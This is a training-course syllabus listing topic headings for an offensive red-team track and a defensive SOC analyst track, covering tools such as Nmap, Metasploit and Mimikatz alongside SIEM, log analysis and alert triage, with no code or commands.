Offensive and defensive Diploma
Offensive Track
• Duration: 60 Hours (15 Sessions)
• Session Duration: 4 hours
The aim of this Path is to show you how to emulate a potential adversary attack in complex environments. Going beyond penetration testing, you will learn to conduct successful Red Team engagements and challenge the defense capability of your clients.
After completing this Course, you will have the advanced skills needed to pursue new career opportunities in offensive security.
Module 0:
● Linux Fundamental
● Network Fundamental
● Welcome to offensive field
Module 1: Introduction to Red Teaming
● Red Team Fundamentals
● Red Team Engagements
● Red Team Threat Intel
● Red Team OPSEC
● Intro to C2
Module 2: Reconnaissance and Footprinting
● Passive and active reconnaissance techniques
● Open-source intelligence (OSINT) gathering
● Target enumeration and identification
● footprinting techniques and tools
● Advanced Foot-Printing techniques
Module 3: Scanning and Enumeration
● Port scanning and service enumeration
● Tips for Awesome Scanning
● Version Scanning with Nmap
● False-Positive Reduction
● Netcat for the Pen TesterGetting the Most Out of Nmap
● Faster Scanning with Masscan
● OS Fingerprinting, Version Scanning In-Depth, Netcat for Penetration Testers, and EyeWitness
● Nmap In-Depth: The Nmap Scripting Engine
● Advanced scanning and enumeration techniques.
Module 4: Exploitation and Post-Exploitation
● Gaining Initial Access
● Password Guessing, Spraying, and Credential Stuffing
● Exploitation and Exploit Categories
● Exploiting Network Services and Leveraging Meterpreter
● Command and Control Frameworks and Selecting the One for You
● Using the Adversary Emulation and Red Team Framework
● Post-Exploitation with [PowerShell] Empire
● Payload Generation in Metasploit and Silver
● Post-Exploitation
● Assumed Breach Testing
● Situational Awareness on Linux and Windows
● Extracting Useful Information from a Compromised Windows Host
Module 5: Privilege Escalation, Persistence, and Password Attacks
● Privilege Escalation Methods and Techniques on Windows and Linux
● Persistence and Maintaining Access
● Password Attack Tips
● Retrieving and Manipulating Hashes from Windows, Linux, and Other Systems
● Extracting Hashes and Passwords from Memory with Mimikatz Kiwi
● Effective Password Cracking with John the Ripper and Hashcat
Module 6: Compromising Active Directory
● Active Directory Basics
● Breaching Active Directory
● Enumerating Active Directory
● Lateral Movement and Pivoting
● Exploiting Active Directory
● Persisting Active Directory
● Credentials Harvesting
Module 7: Network Security Evasion
● Network Security Solutions and Evasion
● Firewalls Evasion
● Sandbox Evasion
Module 8: Use cases
● Real Scenarios and use cases
● Red Team Capture-the-Flag
Defensive Track
• Duration: 60 Hours (15 Sessions)
• Session Duration: 4 hours
In the Junior Security Analyst role, Students will be a Triage Specialist. They will spend a significant portion of Their time triaging or monitoring the event logs and alerts.
The responsibilities of a Junior Security Analyst or Tier 1 SOC Analyst include the following:
● Monitor and investigate alerts (most of the time, it's a 24x7 SOC operations environment)
● Configure and manage security tools
● Develop and implement IDS signatures
● Escalate the security incidents to the Tier 2 and Team Lead if needed
Blue Team Tools and Operations
a. Introduction to the Blue Team Mission
i. What is a SOC? What is the mission?
ii. Why are we being attacked?
iii. Modern defense mindset
iv. The challenges of SOC work
b. SOC Overview
i. The people, process, and technology of a SOC
ii. Aligning the SOC with your organization
iii. SOC functional component overview
iv. Tiered vs. tierless SOCs
v. Important operational documents
c. Defensible Network Concepts
i. Understanding what it takes to be defensible
ii. Network security monitoring (NSM) concepts
iii. NSM event collection
iv. NSM by network layer
v. Continuous security monitoring (CSM) concepts
vi. CSM event collection
vii. Monitoring sources overview
viii. Data centralization
d. Events, Alerts, Anomalies, and Incidents
i. Event collection
ii. Event log flow
iii. Alert collection
iv. Alert triage and log flow
v. Signatures vs. anomalies
vi. Alert triage workflow and incident creation
e. Incident Management Systems
i. SOC data organization tools
ii. Incident management systems options and features
iii. Data flow in incident management systems
iv. Case creation, alerts, observables, playbooks, and workflow
v. Case and alert naming convention
vi. Incident categorization framework
f. Threat Intelligence Platforms
i. What is cyber threat intelligence?
ii. Threat data vs. information vs. intelligence
iii. Threat intel platform options, features, and workflow
iv. Event creation, attributes, correlation, and sharing
g. SIEM
i. Benefits of data centralization
ii. SIEM options and features
iii. SIEM searching, visualizations, and dashboards
iv. Use cases and use case databases
h. Automation and Orchestration
i. How SOAR works and benefits the SOC
ii. Options and features
iii. SOAR value-adds and API interaction
iv. Data flow between SOAR and the SIEM, incident management system, and threat intelligence platform
i. Who Are Your Enemies?
i. Who's attacking us and what do they want?
ii. Opportunistic vs. targeted attackers
iii. Hacktivists, insiders, organized crime, governments
iv. Motivation by attacker group
v. Case studies of different attack groups
vi. Attacker group naming conventions
2. Understanding Your Network
a. Corporate Network Architecture
i. Routers and security
ii. Zones and traffic flow
iii. Switches and security
iv. VLANs
v. Home firewall vs. corporate next-gen firewall capabilities
vi. The logical vs. physical network
vii. Points of visibility
viii. Traffic capture
ix. Network architecture design ideals
x. Zero-trust architecture and least-privilege ideals
b. Traffic Capture and Analysis
i. Network traffic capture formats
ii. NetFlow
iii. Layer 7 metadata collection
iv. PCAP collection
v. Wireshark and Moloch
c. Understanding DNS
i. Name to IP mapping structure
ii. DNS server and client types (stub resolvers, forwarding, caching, and authoritative servers)
iii. Walkthrough of a recursive DNS resolution
iv. Request types
v. Setting records via registrars and on your own server
vi. A and AAAA records
vii. PTR records and when they might fail
viii. TXT records and their uses
ix. CNAME records and their uses
x. MX records for mail
xi. SRV records
xii. NS records and glue records
d. DNS analysis and attacks
i. Detecting requests for malicious sites
ii. Checking domain reputation, age, randomness, length, subdomains
iii. Whois
iv. Reverse DNS lookups and passive DNS
v. Shared hosting
vi. Detecting DNS recon
vii. Unauthorized DNS server use
viii. Domain shadowing
ix. DNS tunneling
x. DNS traffic flow and analysis
xi. IDNs, punycode, and look alike domains
xii. New DNS standards (DNS over TLS, DNS over HTTPS, DNSSEC)
e. Understanding HTTP and HTTPS
i. Decoding URLs
ii. HTTP communication between client and server
iii. Browser interpretation of HTTP and REST APIs
iv. GET, POST, and other methods
v. Request header analysis
vi. Response header analysis
vii. Response codes
viii. The path to the Internet
ix. REST APIs
x. WebSockets
xi. HTTP/2 & HTTP/3
f. Analyzing HTTP for Suspicious Activity
i. HTTP attack and analysis approaches
ii. Credential phishing
iii. Reputation checking
iv. Sandboxing
v. URL and domain OSINT
vi. Header and content analysis
vii. User-agent deconstruction
viii. Cookies
ix. Base64 encoding works and conversion
x. File extraction and analysis
xi. High frequency GET/POST activity
xii. Host headers and naked IP addresses
xiii. Exploit kits and malicious redirection
xiv. HTTPS and certificate inspection
xv. SSL decryption - what you can do with/without it
xvi. TLS 1.3
g. How SMTP and Email Attacks Work
i. Email delivery infrastructure
ii. SMTP Protocol
iii. Reading email headers and source
iv. Identifying spoofed email
v. Decoding attachments
vi. How email spoofing works
vii. How SPF works
viii. How DKIM works
ix. How DMARC works
h. Additional Important Protocols
i. SMB - versions and typical attacks
ii. DHCP for defenders
iii. ICMP and how it is abused
iv. FTP and attacks
v. SSH and attacks
vi. PowerShell remoting
3. Understanding Endpoints, Logs, and Files
a. Endpoint Attack Tactics
i. Endpoint attack centricity
ii. Initial exploitation
iii. Service-side vs client-side exploits
iv. Post-exploitation tactics, tools, and explanations - execution, persistence, discovery, privilege escalation, credential access, lateral movement, collection, exfiltration
b. Endpoint Defense In-Depth
i. Network scanning and software inventory
ii. Vulnerability scanning and patching
iii. Anti-exploitation
iv. Whitelisting
v. Host intrusion prevention and detection systems
vi. Host firewalls
vii. File integrity monitoring
viii. Privileged access workstations
ix. Windows privileges and permissions
x. Endpoint detection and response tools (EDR)
xi. File and drive encryption
xii. Data loss prevention
xiii. User and entity behavior analytics (UEBA)
c. How Windows Logging Works
i. Channels, event IDs, and sources
ii. XML format and event templates
iii. Log collection path
iv. Channels of interest for tactical data collection
d. How Linux Logging Works
i. Syslog log format
ii. Syslog daemons
iii. Syslog network protocol
iv. Log collection path
v. Systemd journal
vi. Additional command line auditing options
vii. Application logging
viii. Service vs. system logs
e. Interpreting Important Events
i. Windows and Linux login events
ii. Process creation logs for Windows and Linux
iii. Additional activity monitoring
iv. Firewall events
v. Object and file auditing
vi. Service creation and operation logging
vii. New scheduled tasks
viii. USB events
ix. User creation and modification
x. Windows Defender events
xi. PowerShell logging
xii. Kerberos and Active Directory Events
xiii. Authentication and the ticket-granting service
xiv. Kerberos authentication steps
xv. Kerberos log events in detail
f. Log Collection, Parsing, and Normalization
i. Logging pipeline and collection methods
ii. Windows vs. Linux log agent collection options
iii. Parsing unstructured vs. structured logs
iv. SIEM-centric formats
v. Efficient searching in your SIEM
vi. The role of parsing and log enrichment
vii. Log normalization and categorization
viii. Log storage and retention lifecycle
g. Files Contents and Identification
i. File contents at the byte level
ii. How to identify a file by the bytes
iii. Magic bytes
iv. Nested files
v. Strings - uses, encoding options, and viewing
h. Identifying and Handling Suspicious Files
i. Safely handling suspicious files
ii. Dangerous files types
iii. Exploits vs. program "features"
iv. Exploits vs. Payloads
v. Executables, scripts, office docs, RTFs, PDFs, and miscellaneous exploits
vi. Hashing and signature verification
vii. Signature inspection and safety of verified files
viii. Inspection methods, detecting malicious scripts and other files
4. Triage and Analysis
a. Alert Triage and Prioritization
i. Priority for triage
ii. Spotting late-stage attacks
iii. Attack lifecycle models
iv. Spotting exfiltration and destruction attempts
v. Attempts to access sensitive users, hosts, and data
vi. Targeted attack identification
vii. Lower-priority alerts
viii. Alert validation
b. Perception, Memory, and Investigation
i. The role of perception and memory in observation and analysis
ii. Working within the limitations of short-term memory
iii. Efficiently committing info to long-term memory
iv. Decomposition and externalization techniques
v. The effects of experience on speed and creativity
c. Mental Models for Information Security
i. Network and file encapsulation
ii. Cyber kill chain
iii. Defense-in-depth
iv. NIST cybersecurity framework
v. Incident response cycle
vi. Threat intelligence levels, models, and uses
vii. F3EAD
viii. Diamond model
ix. The OODA loop
x. Attack modeling, graph/list thinking, attack trees
xi. Pyramid of pain
xii. MITRE ATT&CK
d. Structured Analysis Techniques
i. Compensating for memory and perception issues via structured analysis
ii. System 1 vs. System 2 thinking and battling tacit knowledge
iii. Data-driven vs. concept-driven analysis
iv. Structured analytic techniques
v. Idea generation and creativity, hypothesis development
vi. Confirmation bias avoidance
vii. Analysis of competing hypotheses
viii. Diagnostic reasoning
ix. Link analysis, event matrices
e. Analysis Questions and Tactics
i. Where to start - breaking down an investigation
ii. Alert validation techniques
iii. Sources of network and host information
iv. Data extraction
v. OSINT sources
vi. Data interpretation
vii. Assessing strings, files, malware artifacts, email, links
f. Analysis OPSEC
i. OPSEC vs. your threat model
ii. Traffic light protocol and intel sharing
iii. Permissible action protocol
iv. Common OPSEC failures and how to avoid them
g. Intrusion Discovery
i. Dwell time and intrusion type
ii. Determining attacker motivation
iii. Assessing business risk
iv. Choosing an appropriate response
v. Reacting to opportunistic/targeted attacks
vi. Common missteps in incident response
h. Incident Closing and Quality Review
i. Steps for closing incidents
ii. Quality review and peer feedback
iii. Analytical completeness checks
iv. Closed case classification
v. Attribution
vi. Maintaining quality over time
vii. Premortem and challenge analysis
viii. Peer review, red team, team A/B analysis, and structured self-critique
5. Continuous Improvement, Analytics, and Automation
a. Improving Life in the SOC
i. Expectations vs. common reality
ii. Burnout and stress avoidance
iii. Improvement through SOC human capital theory
iv. The role of automation, operational efficiency, and metrics in burnout
v. Other common SOC issues
b. Analytic Features and Enrichment
i. Goals of analytic creation
ii. Log features and parsing
iii. High-feature vs. low-feature logs
iv. Improvement through SIEM enrichment
v. External tools and other enrichment sources
c. New Analytic Design, Testing, and Sharing
i. Tolerance to false positives/negatives
ii. The false positive paradox
iii. Types of analytics
iv. Feature selection for analytics
v. Matching with threat intel
vi. Regular expressions
vii. Common matching and rule logic options
viii. Analytic generalization and sharing with Sigma
d. Tuning and False Positive Reduction
i. Dealing with alerts and runaway alert queues
ii. How many analysts should you have?
iii. Types of poor alerts
iv. Tuning strategy for poor alert types
v. Tuning via log field analysis
vi. Using policy to raise fidelity
vii. Sensitivity vs. specificity
viii. Automation and fast lanes
e. Automation and Orchestration
i. The definition of automation vs. orchestration
ii. What is SOAR?
iii. SOAR product considerations
iv. Common SOAR use cases
v. Enumeration and enrichment
vi. Response actions
vii. Alert and case management
viii. The paradox of automation
ix. DIY scripting
f. Improving Operational Efficiency and Workflow
i. Micro-automation
ii. Form filling
iii. Text expanders
iv. Email templates
v. Smart keywords
vi. Browser plugins
vii. Text caching
viii. JavaScript page modification
ix. OS Scripting
g. Containing Identified Intrusions
i. Containment and analyst empowerment
ii. Isolation options across network layers - physical, link, network, transport, application
iii. DNS firewalls, HTTP blocking and containment, SMTP, Web Application Firewalls
iv. Host-based containment tools
h. Skill and Career Development
i. Learning through conferences, capture-the-flag challenges, and podcasts
ii. Home labs
iii. Writing and public speaking
iv. Techniques for mastery and continual progress
—----------------------------------------------------------------------------------
Capture The Flag
Using network data and logs from a simulated network under attack, we provide a full day of hands-on work applying the principles taught throughout the Course. You will be challenged to detect and identify attacks to progress through multiple categories of questions designed to ensure mastery of the concepts and data covered during the course
—----------------------------------------------------------------------------------
Course Exercises
● TheHive Incident Management System
● MISP Threat Intelligence Platform
● SIEM with the Elastic Stack , Splunk
● Exploring DNS
● HTTP and HTTPS Analysis
● SMTP and Email Analysis
● Interpreting Windows Logs
● Log Enrichment and Visualization
● Malicious File Identification
● Alert Triage and Prioritization
● Structured Analytical Challenge
● Collecting and Documenting Incident Information
● Alert Tuning
● Security Automation
● Incident Containment
● TryHackm Soc Leve